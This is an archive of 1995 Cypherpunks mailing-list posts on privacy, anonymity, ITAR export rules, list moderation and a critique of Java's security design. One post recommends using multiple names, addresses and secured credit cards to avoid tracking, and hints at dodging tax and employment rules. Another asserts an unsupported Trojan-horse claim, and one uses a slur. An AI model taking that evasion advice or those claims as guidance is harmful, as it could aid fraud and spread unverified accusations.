So Gleick wants to unleash the Justice Department to protect his ISP from
Microsoft's competition.  Can't cut it without Big Brother's help, eh?  

All I've got to say about this piece of commie trash is GM, ATT, IBM, USSR,
CIA, & KGB.

It took me all of 10 seconds to figure out how to delete the icons for the
MSN and MS' Internet Browser from my WIN95 desktop.  The help message that
popped up when I did this also told me how I could delete the actual
programs from my hard drive.  (Hint James try clicking the *right* mouse
button.)

DCF

"Worrying about a large institution especially when it has computers is like
worrying about a large gorilla especially when it's on fire." Bruce Serling.
CFP95. 






From frissell at panix.com  Sun Nov  5 18:23:00 1995
From: frissell at panix.com (Duncan Frissell)
Date: Mon, 6 Nov 1995 10:23:00 +0800
Subject: "The Policeman Inside"
Message-ID: <199511060208.VAA14131@panix.com>


At 09:54 AM 11/5/95 -0800, you wrote:

>My point, originally, to Rich Graves' mention of Chris Hibbert's excellent
>FAQ on Social Security Numbers and person numbers, is that it is no longer
>relevant to fight against a "single index number." Modern data base methods
>are so well-suited to cross-indexing that it hardly matters whether there's
>a single point of entry to the data base or not.

However, modern life is also well-adapted to the counter strategy of
fuzzying up any focus on your "cluster of transactions."  Thus it is trivial
to use multiple names and addresses for multiple transactions.  Particularly
if you "go bare" in the insurance arena, many tracking opportunities are
denied your opponents.  This will also save you big bucks in premiums
foregone.  You also have to watch the stuff most people don't think about
like magazine subscriptions which can easily be had in any name (and should be).

The current possibility of getting multiple secured credit cards in multiple
names will become even more fun as the temporary Visa and Mastercards
(travelers's checks on a card) are issued.  Plenty of entrepreneurs will be
buying and selling those.  Just like the phone card market today.

>THE KEY POINT IS THIS: Are voluntary economic transactions between persons
>to be subject to approval and regulation by the State? 

They will no doubt try but closed systems have a hard time competing with
open systems. A good way to track the future control possibilities is to
track how easy it is to get an internet account.  If it remains as easy to
get an internet account in the future as it does today, then it will be very
hard to indulge in central transaction controls. I am predicting that there
will be a convergence between the ease of communicating over the nets
(institutional ease not interface ease) and the ease of completing
transactions.  I think the convergence will be one sided in the direction of
easier and easier transactions.  Again, I'm not talking about technical ease
here but the structural or institutional ease of completing transactions.
"Frictionless Capitalism" is frictionless across the board.

The belief that it is possible to "press down upon the brow of labor this
Crown of Thorns, to crucify mankind upon a Cross of Red Tape" (to mangle a
phrase) is worthy of ridicule.  I happened to catch "Funeral in Berlin"
today.  The Commies didn't manage it with a lot more going for them than
Slick Willie has.  They got their clocks cleaned by MarketEarth.  The
Securities and Exchange Commission doesn't stand a chance.  

>If babysitting and
>lawnmowing, not to mention hiring someone to write some C code, requires
>submitting tax and Social Security forms, requires checking the J-1 vs.
>Permanent Resident vs. Approved Citizen Unit status, then the die is cast.

I thought the guy was in Zamboanga (where the monkeys have no tails).  At
least that's what he told me in his email.  The gardener was an independent
contractor.  The babysitter worked for a temp agency (at least that's what
she said).  I know I paid a company.  At least the digicash went to
something with a company name.

>Well, the State is becoming more efficient in tracking such things, and tax
>penalties are increasing.

Not sure if that's true.  Are there fewer illegal aliens, fewer people
driving without licenses, fewer people practicing medicine without a
license, etc than in 1960, 1970, 1980?  I seriously doubt it.

>In closing, we must beware "the policeman inside," to use the William
>Burroughs term. A surveillance state that arises because modern computers
>and data bases allow all economic transactions to be monitored, taxed, and
>approved or disapproved is a horror we should fight with all of our
>resources. Whether right-, left-, or libertarian-leaning, the implications
>of this state power to control our lives are horrible.

No argument there.

DCF

"Freedom isn't Freeh 
freedom isn't Freeh
you've got to pay the price 
you've got to sacrifice
for your liberty" -- Here's hoping you're all morally rearmed.






From ses at tipper.oit.unc.edu  Sun Nov  5 21:06:07 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Mon, 6 Nov 1995 13:06:07 +0800
Subject: nym-compoop
In-Reply-To: <199511060335.WAA04917@maple.sover.net>
Message-ID: <Pine.SOL.3.91.951105204109.7550C-100000@chivalry>


On Sun, 5 Nov 1995, Stephen Whitaker wrote:

> Back to where this started:
> Eating my tasty crow gives rise to another question relating to the timing
> and continuity of these threads: How did the first responder on the RE:
> 134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
> of 7:19AM on Nov 5? Which way is this thing spinnin?

Multiple choice:

a) Because I have a PPP connection to Dionne's Psychic Internetwork
b) Because my brownian motion RNG used an inferior quality rubber band 
   and I can now travel through time.
c) Because the Earth is round.

lets work the example:

a) can't be correct, because there's no way anyone on my salary could 
   afford the 1-900- charges.

b) can't be correct because If I could travel in time this weekend, I'd have 
   gone to  Ramat Gan with an Uzi, and one of the best generals of the 
   twentieth century would still be  alive.

c) could be... I wrote the message from a machine in Menlo Park, which is 
   in the pacific time zone. Convert both times to GMT, and everything make 
   sense.

Simon





From eay at mincom.oz.au  Sun Nov  5 21:31:54 1995
From: eay at mincom.oz.au (Eric Young)
Date: Mon, 6 Nov 1995 13:31:54 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <Pine.SOL.3.91.951106125951.9610D-100000@orb>



On Fri, 3 Nov 1995, Futplex wrote:
> Suppose I have serious and plausibly realistic aspirations to become an 
> authority in some subtopic of cryptography, network security, etc. (sometime 
> well into the next millenium). Am I more likely to learn and hone my skills
> by actively participating (sticking my neck out) or merely lurking
> indefinitely ?  Regardless of the answer to the previous question, should
> the list suffer me my missteps and naivete ?

I too have though about this question.  While I write crypto code and know
some areas quite well, I also seem to be blessed with the ability to
displaying my total ignorance in other areas in very public forums.  Since
I have no professional reputation to protect (I don't work in the
crypto field) and don't really have any 'aspirations to become an
authority', I feel I can do this so long as I also make
an effort to answer the question in the area of my expertise and to
also share the information I gain.

The difference between ignorance and stupidity is that one decreases 
with time :-).

eric (who is quite happy to admit his ignorance :-)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay at mincom.oz.au    | more followups than the message contents :-)







From anonymous-remailer at shell.portal.com  Sun Nov  5 23:12:03 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 6 Nov 1995 15:12:03 +0800
Subject: Keyed-MD5, and HTTP-NG
Message-ID: <199511060639.WAA20500@jobe.shell.portal.com>


On Wed, 1 Nov 1995 hallam at w3.org wrote:

> > There were two names on the MD5 document -- mine and Bill
> > Simpson's. Bill didn't tell me that he was called (I suspect he 
> > would have), and I wasn't called, either. We were the only two 
> > editors of that portion of the specification.
> 
> This appears to have been a problem from both ends. A number of
> people arround here only heard about the IPsec work when it had
> reached the final call phase.

Hmmm, I guess (as usual) people weren't keeping up with the drafts.  It 
really makes some of us outsiders wonder what the IETF actually does in 
its gilded white towers.

> I think this highlights one of the problems with the IETF we need a 
> much broader infrastructure for understanding what progress other 
> groups have made. The time when we can expect to do everything through 
> email alone is past. I wish I could persuade more people in the IETF
> that the Web infrastructure could provide a valuable assistance
> as a collaboration tool for their needs. Unfortunately the approach seems
> to be that because there are is a person living at the end of a 2400
> baud modem in vermont who cannot configure his PPP we should all continue
> in the stone age. 

I guess that's certainly an _elitist_ attitude.  Let's leave Vermont alone
for a second and maybe talk about including the developing world in the
process.  That might explain some of the resistance. 

In many parts of the world, the basic telecommunications infrastructure
simply won't support a 2400 baud connection.  Does this then mean that
there should be no advocate, no voice for citizens from those regions
because they are limited to 300 baud? 

Hopefully we all agree that developing nations are equally entitled to a
voice in establishing standards which will define the foundations of the
next century.  I can't imagine anyone arguing for a pre-emptive silencing.
of voices which strive to be heard through setting technical standards as
a floor -- minimum standards which are designed *purposefully* to exclude. 

Next thing someone will advocate is EBCDIC, or something equally lame
idea, I guess ... 

> We could improve readability of RFCs through using HTML and reduce
> the flamage on mailing lists through collaboration tools like the
> open meeting. But we don't because it hasn't been done that way in the
> past.

Well, I think that it is possible to read a mailing list through HTML if
that is what you would like to do.  You have that option and choice. But
this does not mean that you should dictate that everyone should follow
your choices and preferences. 

While some would argue, that the attempted imposition of your personal
preferences is demonstrative of a monstrous ego that does not recognize
inherent individual jurisdiction, I won't expose myself to the accusation
that I would advance such a specious argument, I will simply ask what you
would suggest is the solution to including alternate views and voices, if 
it isn't a mailing list.

Will the standards track follow a policy of inclusion or historic policies
of exclusion? 

> I would like to see a collaboration system where I can present an expert
> with the context of a proposal very rapidly without expecting them to
> read the archives of an entire mailing list.

It really doesn't take all that long to get up to speed.  A couple of
months, tops.

> 	Phill
> 


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From EWilhem at aol.com  Mon Nov  6 00:06:50 1995
From: EWilhem at aol.com (EWilhem at aol.com)
Date: Mon, 6 Nov 1995 16:06:50 +0800
Subject: Magic Money
Message-ID: <951106025715_99002994@emout06.mail.aol.com>


Where do I get the software, Please E-mail me at roger12 at cam.org. I'd like
the 
evaluation software.





From vznuri at netcom.com  Mon Nov  6 01:04:34 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Mon, 6 Nov 1995 17:04:34 +0800
Subject: on topic!!
Message-ID: <199511042217.OAA16960@netcom9.netcom.com>



PM and TCM frequently debate about what is relevant on this list.

I have sometimes commented on this.

in fact PM's conservative stance to relevance, and TCM's more liberal
one, and the tension between the two goes back to list origins.

this is a highly inflammable topic, and I am surely going to get my
eyebrows toasted for saying *anything*, however I would like to say 
a few things:

if there were two key elements here, these conversations would probably
largely go away (instead of continually reappear)

- an unambiguous charter
- an active moderator

unfortunately I suspect that a moderator does exist but he "prefers
to remain anonymous" ("pseudonymous"?). imho that is precisely 
how *not* to succeed as a moderator.

PM and TCM are indeed filling a genuine vacuum. when the moderator is AWOL, 
pseudomoderators fight each other.

(oops, the whole idea of a moderator is just not anarchic enough. well, then
I suggest everyone just enjoy these repeated, endless displays of public
bile and hostility as the basic modus operandii of people who embrace the
glory of anarchy. anarchy in action!! but it is more fun to deny them
as total delusions and effects entirely attributable to one's enemies..)

--

also, another frequent split on this list is of politics vs. coding.
frankly I think just having two lists, one dedicated to "cypherpunk
politics", the other dedicated to "cypherpunk technicality", would
solve most problems.

and finally again I suggest as I have in the past that no one other
than the moderator really has any authority to say what is or is not 
relevant. and if you see someone say what is, take it with a grain
of salt, or ignore it if you like.

a major problem is people defending themselves when they are attacked
by someone who says "that's not relevant!!". the problem is the perception
of the loss of face. otherwise, what's the point? this is an 
interesting psychological effect that I have observed even when people use 
pseudonyms. it seems it is deeply ingrained into human behavior. this
list is in fact imho a hotbed of psychological displays. the machismo
factor is pretty thick and deep at times too.

to all this I suggest one consider the idea that "criticism by a bonehead is 
as flattering as praise from a genius".

(hee, hee)

for those who absolutely cannot refrain from trying to yell at other
people about relevant postings (judging by the mail, a rather significant
percentage) I suggest you quote the *charter* whenever you do so, to
demostrate whatever authority it is you think you have.

--

anyone who needs moderator lessons should take them from S.Sandfort,
an ex teacher who runs cypherpunk meetings involving a lot of childhood
psychologies as effectively as humanly possible, IMHO.

--

p.s. it appears to me the entrance requirements for cypherpunk membership
are to have a 150 IQ and a 75 *EQ*. and that all the arguing and hostility
comes from the more uninhibited pathological cases of these people.

--

one could in fact have great fun impersonating someone with a 
grotesquely low EQ on this list and create a tremendous reaction
among all the people with equally low EQs, responding to the bait
with the same intelligence a fish attacks a wiggling worm.

it would be "evolution in action", imho.

(hee, hee.)








From tcmay at got.net  Mon Nov  6 17:22:44 1995
From: tcmay at got.net (Timothy C. May)
Date: Mon, 6 Nov 95 17:22:44 PST
Subject: DejaNews all over again--a URL for Usenet Searching
Message-ID: <acc3f0380a02100406fd@[205.199.118.202]>


[Please don't copy Eugene Volokh <VOLOKH at law.ucla.edu> on your follow-ups;
I copied him on my original because I had quoted him.]

At 10:04 PM 11/6/95, s1113645 at tesla.cc.uottawa.ca wrote:

>Judging by the amount of posting you do here, I was surprised that I only
>got 36 listings on your new address (1/3 of which quoted you but not
>directly written by you). Either you post more to alt, soc and talk (which
>they
>don't have) or you use a third address (the second thing I tried was
>tcmay at netcom.com, even less, though the archive's pretty recent, so that's
>expected).

I do little posting these days on Usenet. There is almost no sense of
"community" there, in the sense of persistent, memorable posters, and in
the sense of even _slightly_ having similar goals and aspirations. A vast
number of the posts on any topic come from people who just rolled off the
turnip truck and who have no interest in learning.

>I figured I'd send this to you as a private note, but then I figured
>this thing really is scary and has a lot to do with anonymity.
>Watch out folks. Litte Brother is saving everything you've ever said on
>usenet. Your old posts just won't go away.

I've assumed this for many years. One used to be able to buy "Usenet on
CD-ROM"...before the volume got to be too high. I've always assumed that
archives would be increasingly available, eventually covering the entire
history of Usenet, going back to the early 80s, and with tools for tracking
the changes in login names over time (so that, for example, Perry's 1984
postings could be easily retrieved).

Dossier services are coming, of course. If not legal to operate in the
U.S., trivial to locate offshore. ("Employers, we will provide a scan of
prospective employers. We can let you know if potential employees have ever
posted to alt.drugs, alt.homosexual, alt.deviancy, or alt.cypherpunks.
Avoid needless risks.")


>(Not that someone who is so open in his views and true name as yourself
>would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived
>yet. It's bad enough they have rec.)

Huh? What makes you think "alt" is not archived? Just because DejaNews
doesn't index it doesn't mean it is isn't archived in various places.

Paul Robichaux pointed me to another searcher, http://www.excite.com/,
which _does_ index the alt groups. I'm sure more are coming, reaching
further and further back in time. (At the rate the Net has been expanding,
by the time they can archive-and-index the last year of Usenet, they can
get the entire history for not much more. I'll bet this happens by the end
of 1997.)


>Ps. I will of course run searches on every other address that the who
>command on majordomo at toad.com supplies me with, so watch what you say
>ladies, gents and otherwise. ;->
>Get those 'nyms ready.

I offered the "Blacknet Dossier Service" a couple of years ago to the
Extropians list subscribers. Nick Szabo helped me out by claiming to the
list that he had purchased his dossier contents, and was "shocked" by what
he found. A number of the Extropian list subscribers were quite perturbed
before I told them it was a joke. Then I pointed out to them that there is
absolutely nothing which stops such things.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From fc at all.net  Mon Nov  6 02:17:23 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 18:17:23 +0800
Subject: nym-compoop
In-Reply-To: <199511060335.WAA04917@maple.sover.net>
Message-ID: <9511061002.AA10494@all.net>


> I'm glad "nobody" thinks I'm a nym for being a good eight hours:fifty-nine
> minutes out of step and having lowered my reputation in his/her eyes. Now
> I'll ask my question again, which apparantly got lost in the collective
> groan of my stale post:

You're just fine.

>         Are there ways for someone with access to modify router tables 
>         to constantly create alternate paths at other routers 
>         which would serve to end-around any such snoops?

Yes - and for other purposes as well.

...
> I can hardly find anyone who even cares about the fact that our legislature
> relies on the executive branch gov-net managers for their port/connection on
> the internet router. They also rely on the executive branch for
> troubleshooting their novell LAN. Does anyone else see a separation of
> powers issue or privacy issue here? Note that I cc: the speaker, who cares
> but doesn't yet grasp the implications. Feel free to write him directly. His
> name is Michael Obuchowski, Obe for short, <speaker at leg.state.vt.us>, tell
> him I sent you.

Is this really him, or just a secretary with electronically generated
keyword search and reply capabilities?

...
> Back to where this started:
> Eating my tasty crow gives rise to another question relating to the timing
> and continuity of these threads: How did the first responder on the RE:
> 134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
> of 7:19AM on Nov 5? Which way is this thing spinnin?

Time zone differences.  I also wish my mailer understood GMT so it would
properly sort events in time order instead of sender time of day order. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From perry at piermont.com  Mon Nov  6 18:20:48 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 95 18:20:48 PST
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCcXa-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511070208.VAA14762@jekyll.piermont.com>



"Peter D. Junger" writes:
> : I understand that you are a lawyer and I'm not, but it is my
> : understanding that international treaties come in to play on this sort
> : of thing. For instance, in international shipments, you can transship
> : items and substances that are illegal to possess in a country through
> : its ports provided that the materials do not originate or terminate
> : their shipment in the country and remain sealed in their containers
> : throughout. It is also my understanding that items like mail and phone
> : calls that happen to transit a country are not necessarily subject to
> : that nations laws provided that the nation is not a terminal point for
> : the mail or call or what have you.
> 
> The trouble is that the ITAR's definition of export that is relevant
> to cryptographic software has nothing to do with exporting in the
> normal sense, and therefore it has nothing to do with transhipments.

I am starting to have trouble believing you are a lawyer. Are you
actually telling me that treaties which explicitly indemnify
transshipment customers against local laws are superceeded by lower
level laws, in spite of the supremecy clause of the constitution? That
might be what the state department would tell you, but I'd have
trouble believing even a lobotomized mongoloid judge would let that
stand. Treaties are treaties, period.

Perry





From fc at all.net  Mon Nov  6 03:02:23 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 19:02:23 +0800
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <9511061047.AA13370@all.net>


WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

>From the Java Web pages (as combined in Firewalls/BoS):

> The language's security features (not just applets):
> 
> (http://java.sun.com/whitePaper/javawhitepaper_6.html#HEADING15)
> 
> 4.2 Security in the Java Environment
> 
> Security commands a high premium in the growing use of the Internet
> for products and services ranging from electronic distribution of
> software and multimedia content, to "digital cash". The area of
> security with which we're concerned here is how the Java compiler and
> run-time system restrict application programmers from creating
> subversive code.

But not non-subversive code?  Sounds like a value judgement to me.
Subversive code is not otherwise defined in these documents.

> The Java language compiler and run-time system implement several
> layers of defense against potentially incorrect code.

Is incorrect code subversive?  Vica versa? Does Java provide defenses
against my code not properly calculating numbers?

> One of the Java
> compiler's primary lines of defense is its memory allocation and
> reference model. Simply put, Java does not have "pointers" in the
> traditional C and C++ sense--memory cells that contain the addresses
> of other memory cells.
> 
> Memory layout decisions are not made by the compiler, as they are in C
> and C++. Rather, memory layout is deferred to run-time, and will
> potentially differ depending on the characteristics of the hardware
> and software platforms on which the Java language system is
> executing. The Java interpreter references memory via symbolic
> "handles" that are resolved to real memory addresses at run time. Java
> programmers can't forge pointers to memory, because the memory
> allocation and referencing model is completely opaque to the
> programmer and controlled entirely by the underlying run-time system.

Just because it is opaque, doesn't mean you can't happen across a valid
(but perhaps undesirable) handle.  Sounds like a good issue for attack
by crypto-types.  How do we guess the handle of the disk IO routines?

> Very late binding of structures to memory means that programmers can't
> infer the physical memory layout of a class by looking at its
> declaration. By removing the C/C++ memory layout and pointer models,
> the Java language has eliminated the programmer's ability to get
> behind the scenes and manufacture pointers to memory. These features
> must be viewed as positive benefits rather than a restriction on the
> programmer, because they ultimately lead to more reliable and secure
> applications.

Is the language un-predictable? The same program executes differently
each time? A pseudo-random allocation? What is the technique used to
implement this, and why should we believe it is in fact secure in some
sense.  And if so, in what sense?

> The Byte Code Verification Process
> 
> What about the concept of a "hostile compiler"? Although the Java
> compiler ensures that Java source code doesn't violate the safety
> rules,

What are these "safety rules"?  No reference to them in this document!

> when an application such as the HotJava web browser imports a
> code fragment from anywhere, it doesn't actually know if code
> fragments follow the Java language rules for safety--the code may not
> have been produced by a known-to-be trustworthy Java compiler. In such
> a case, how is the Java run-time system on your machine to trust the
> incoming byte code stream? The answer is simple--it doesn't trust the
> incoming code, but subjects it to byte code verification.
> 
> The tests range from simple verification that the format of a code
> fragment is correct, to passing through a simple theorem prover to
> establish that the code fragment plays by the rules--that it doesn't
> forge pointers, it doesn't violate access restrictions, and it
> accesses objects as what they are (for example, that "InputStream"
> objects are always used as "InputStreams" and never as anything
> else). A language that is safe, plus run-time verification of
> generated code, establishes a base set of guarantees that interfaces
> cannot be violated.

Wait a minute.  If it's so safe, what code can possibly be sent in that
would cause a violation? If the prover is so simple, how can it show
things (e.g., program correctness) in real-time on a PC that the rest of
the world can't show with supercomputers over extended periods? What
EXACTLY are these things doing, and why should we believe they are safe?

> The Byte Code Verifier
> 
> The last phase of the byte code loader is the verifier. It traverses
> the byte codes, constructs the type state information, and verifies
> the types of the parameters to all the byte code instructions.


> The illustration [see the HTML] shows the flow of data and control
> from Java language source code through the Java compiler, to the byte
> code verifier and hence on to the Java interpreter. The important
> issue is that the Java class loader and the byte code verifier make no
> assumptions about the primary source of the byte code stream--the code
> may have come from the local system, or it may have travelled halfway
> around the planet. The byte code verifier acts as a sort of
> gatekeeper. The byte code verifier ensures that the code passed to the
> Java interpreter is in a fit state to be executed and can run without
> fear of breaking the Java interpreter.

So there are byte code sequences that can break the interpreter!

> Imported code is not allowed to
> execute by any means until after it has passed the verifier's
> tests. Once the verifier is done, a number of important properties are
> known:
> 
>       There are no operand stack overflows or underflows

Not so easily proven, is it?

>       The types of the parameters of all byte code instructions are
> 	known to always be correct

Huh? I thought you couldn't have incorrect types.  Do they mean that you
can have incorrect types but that they are detected by the verifier at
load time?

>       No illegal data conversions are done, like converting integers
> 	to pointers

How about legal ones - like converting integers to pointers via case
statements?

>       Object field accesses are known to be legal--private or public
> 	or protected

What exactly does this mean?

> While all this checking appears excruciatingly detailed, by the time
> the byte code verifier has done its work, the Java interpreter can
> proceed knowing that the code will run securely. Knowing these
> properties makes the Java interpreter much faster, because it doesn't
> have to check anything.  There are no operand type checks and no stack
> overflow checks. The interpreter can thus function at full speed
> without compromising reliability.

Can computers actually "know" anything?

No runtime checking whatsoever.  Get past the supposed verifier, and you
have free run of the machine.  A single verifier bug or inadequacy, and
the world is unsafe for electronic commerce.  And has the Java code been
verified to prove the claimed properties?  Against what criteria?  Where's
the beef?

> Security Checks in the Class Loader
> 
> After incoming code has been vetted and determined clean by the byte
> code verifier, the next line of defense is the Java class loader. The
> environment seen by a thread of execution running Java byte codes can
> be visualized as a set of classes partitioned into separate name
> spaces. There is one name space for classes that come from the local
> file system, and a separate name space for each network source.
> 
> When a class is imported from across the network it is placed into the
> private name space associated with its origin. When a class references
> another class, it is first looked for in the name space for the local
> system (built-in classes), then in the name space of the referencing
> class.  There is no way that an imported class can "spoof" a built-in
> class. Built-in classes can never accidentally reference classes in
> imported name spaces--they can only reference such classes
> explicitly. Similarly, classes imported from different places are
> separated from each other.

But they can explicitly reference each other? I can only explicitly open
a file called command.com on your PC?

> Security in the Java Networking Package
> 
> Java's networking package provides the interfaces to handle the
> various network protocols (FTP, HTTP, Telnet, and so on). This is your
> front line of defense at the network interface level. The networking
> package can be set up with configurable levels of paranoia. You can:
> 
>       Disallow all network accesses 
> 
>       Allow all network accesses 
> 
>       Allow network accesses to only the hosts from which the code was
> 	imported
> 
>       Allow network accesses only outside the firewall if the code
> 	came from outside

Who wants to bet that 99+% of all users configure "Allow all network
accesses".  Hot Java today is defaulted to this state. 

> Applet-specific security: (written for the 1.0a3 release of
> HotJava(tm)... there will be a rewrite for the 1.0b release when that
> occurs.  I'm assuming, perhaps incorrectly, that the Netscape
> implementation is similar.  As I understand it, they licensed the HJ
> code from Sun, so I think it's all very close to the truth.)
> 
> (http://java.sun.com/1.0alpha3/doc/security/security.html)
> 
> [ A rehash of the above text, snipped ]
> 
> Security level four: protecting the file system and network access
> 
> HotJava enforces security policies confident that its security
> interfaces are secure.

In other words, it assumes the other three levels worked properly.
If they don't, you're screwed.

> The three lower levels of security guarantee
> that all local classes, e.g., the file access primitives, are
> themselves protected from being supplanted, replaced, or extended by
> imported code.

You're screwed.

> The file access primitives implement an access control list that
> controls read and write access to files by imported code (or code
> invoked by imported code). The defaults for these access control lists
> are very restrictive[*]. If an attempt is made by a piece of imported
> code to access a file to which access has not been granted, a dialog
> box pops up to allow the user to decide whether or not to allow that
> specific access. These security policies err on the conservative side
> in order to ensure maximum security. This conservative approach may
> make writing some applets more difficult or awkward.

By default - ask the user.  That's restrictive? Please press the OK
button to have our free Lotus update loaded into your computer.

> For network security, HotJava provides a variety of mechanisms that
> can provide information about the trustworthiness of imported
> code. These mechanisms cover a wide range of possibilities. At the
> simple end the system can check on the origin of a code fragment to
> determine if it came from inside or outside a firewall.  At the
> sophisticated end of the range a mechanism exists whereby public keys
> and cryptographic message digests can be securely attached to code
> fragments that not only identify who originated the code, but
> guarantee its integrity as well. This latter mechanism will be
> implemented in future releases.

So today, if the admin specifies the proper IP address ranges when
loading Java into each computer in the network, and if no user ever
installs Java on their own, "code" downloads from external machines
may be stopped - unless the user says OK.

> The security policies implemented by the runtime system can be
> dynamically adjusted based on the information available concerning the
> origin of a code fragment. The Socket class provides such an example.
> 
> The Socket class implements security policies that are adjusted to
> reflect the trustworthiness of the code that invoked it, and
> transitively, the code that invoked the invoker. The information about
> what code began the chain of execution is available to the class in
> the form of which namespace contains the invoking code and what
> parameters are associated with that class. The class loader puts the
> classes it has loaded in a specific namespace, allowing the Socket
> class to determine the network host from which a class is loaded.
> 
> Knowing the network host allows the HotJava security mechanism to
> determine whether the class originated inside or outside a
> firewall. Knowledgable users of HotJava can decide which category of
> hosts to trust when loading executable code.

How about the more than 99.99% of users who are not knowledgable of HotJava?

> For example, the Socket
> class can implement the policy of only allowing new connections to be
> created that terminate at the host from whence the code was
> loaded. This restriction means that code loaded from outside a
> firewall cannot connect to other machines on the net behind the
> firewall.

Unless that machine acts as a gateway for further processing.

> Code that comes from more trusted sources can be allowed
> more freedom to make connections to other machines. As an additional
> defense against untrusted sources HotJava's security can be set to
> prevent any code from being loaded. The level of security is
> configurable by HotJava users.

The user dictates the security policy.  Any user in your site can
potentially, through error or omission or intent, open up a hole to your
entire network by accidentally pressing the OK button one time or by
setting a configuration parameter incorrectly.  And your firewall will
not save you.

ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.

P.S.

When: Tuesday, November 7, 8AM
Where: The Hilton, Washington D.C. (the CSI conference)
The talk: 50 Ways to Attack Your World Wide Web Systems

If you want a chance to heckle - be there.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From anonymous-remailer at shell.portal.com  Mon Nov  6 03:02:52 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 6 Nov 1995 19:02:52 +0800
Subject: Crypto++, Cpunk Icons, list noise
Message-ID: <199511061050.CAA17098@jobe.shell.portal.com>


On Sat, 4 Nov 1995 don at cs.byu.edu wrote:

> An anonymous complainer writes:
> 
> >Well, Perry, my opinion is that there is far too much noise on this list 
> >as it is.  I have already seen my words drowned out by bellyaching over 
> >next to nothing.
> 
> POT-KETTLE-BLACK.
> 
> Also, since nothing you've written (in your commentary, as opposed to
> anonymous announcements or releases that most people use anonymity for
> here) indicates that you're using anonymity for any particular reason,

Hmmm, I'm not sure that anyone has an inherent right to question WHY a
person seeks moments of anonymity or privacy.  I don't believe that
anyone should be placed on the defensive, for *choosing* to maintain
some semblance of a personal life, or wishing to maintain some
illusions that they might still have some shred of personal privacy
left.  Hopefully, we can still leave a man with his dignity.

I should not have to defend my right to present my ideas as I believe
are appropriate to the circumstances.  My choice to present the idea,
that an entire economic sector needs to carefully reevaluate their
strategic choices, and their discovered hidden security attitudes -- will 
stand or fall strictly on its merits.  The debate is not advanced in any 
way by attaching a reputation to the question.

Like any other person, I have my skeletons, and I have my regrets.  I 
certainly have unfinished, unresolved, issues that I need to tend to.  In 
that sense, I am no different than any other man.  I also realize that 
ultimately, I'll have to come forward from behind the veil of secrecy 
which is provided to me.  

This I will do, after I have reconciled my own security considerations.

Please allow me the boundary and dignity to choose when, where, and in 
what form I choose to reveal myself.  That inherent right, should be
extended to any man, and no man should be called to account for his 
desire to maintain his personal privacy, no matter how arbitrary his
reasons.

Especially when he comes forward to challenge Goliath.

> please stop so people can killfile you. Or send it from a nym at
> alpha.c2.org. I mean, the NSA has your real name anyway, what's the
> point... 

At this time, I don't feel that a bi-directional private communications
channel is needed.  I have no need for a "nym".  People who need to
contact me, can.  People who would like to know a bit about me, can. 
Netscape has my address.  So does AT&T.  And reputations aren't pertinent. 

(Although, I will say, that the disappearing here-again, gone again,
internet draft at ds.internic.net is simply childish, and I'm certain that
it was just routine "file maintenance" that caused the flicker.)

The ball isn't in my court, it's in theirs.

Netscape and AT&T are some of the primary parties who will have to take
the hit for the fiasco that they find themselves in.  For now, I'll leave
my communication channels with them open, rather than letting my mail
queue fill more than it already has.  Email that is already overqueued. 
 
I don't really envy the two companies' position.  No one expects to find
as significant a security flaw as my anonymous email to this list detailed
at this stage of code Burn-In, and I don't take any pleasure in facing the
unenviable task of informing ANY party that a Trojan Horse has been
engineered into the fabric of an existing globally installed code base. 

No one does.

And as the messenger, I (hope) I don't have anything to fear, from the NSA
or any other foreign group that would seek to pursue its own agenda within
the borders of sovereign Canada.  I really don't think that the NSA is
"evil incarnate", as some list subscribers do.  They have their
intelligence and know how to use it.  Usually, they use it prudently. 

If I did have any worries about the NSA, then I might take some elementary
precautions.  I certainly wouldn't have my terminal screen pointing
towards the twelve odd feet of open glazing that sits behind me, as I
currently do. 

Privacy can't simply be reduced to "a desire to hide from the NSA", just
as security isn't something which is simply provided by licensing from
RSA. 

Look to the message rather than the messenger.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From merriman at arn.net  Mon Nov  6 03:12:24 1995
From: merriman at arn.net (David K. Merriman)
Date: Mon, 6 Nov 1995 19:12:24 +0800
Subject: ecash remailer
Message-ID: <199511010018.SAA06259@arnet.arn.net>


>Hal writes:
>[suggesting a problem with Ed the Currency Cleaner]
>> What about this, though: Alice did not mean to pay Bob, but rather
